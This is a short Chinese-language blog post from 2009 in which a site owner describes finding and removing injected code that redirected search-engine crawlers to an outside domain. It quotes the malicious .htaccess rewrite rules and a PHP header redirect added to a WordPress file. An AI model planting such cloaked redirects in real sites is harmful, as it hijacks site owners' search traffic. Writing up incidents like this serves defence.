遭遇恶意代码(外篇)

orczhou — Fri, 07 Aug 2009 14:40:17 +0000

在前篇清除go00ogle.net的恶意代码后，浏览器虽然都可以正常访问了，但google爬虫却无法收录网站的内容，仔细一排查，又发现另一片天空。

经过HTTP 状态码/响应代码_检测发现，网站会将Google爬虫的请求重定向到ahtung.co.in(未知站点)。Why? 检查发现，原来是站点中被恶意添加了如下两段代码所致：

站点根目录中.htaccess文件尾部被恶意添加：
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} (Googlebot|Slurp|msnbot)
RewriteRule ^ http://ahtung.co.in/ [R=301,L]
文件wp-blog-header.php文件头部被恶意添加：
if (eregi(“google”, $agent)) {header(“HTTP/1.1 301″); header(“Location: http://ahtung.co.in/”); exit(); }

以上两端代码都会导致将google爬虫的请求重定向到ahtung.co.in。删除前面两端代码，google爬虫的请求就会正常了。(至于，为什么有人会转发google爬虫的请求？参考这里)

(全文完)

一个故事@MySQL DBA » ahtung.co wp hacked go00ogle.net

遭遇恶意代码(外篇)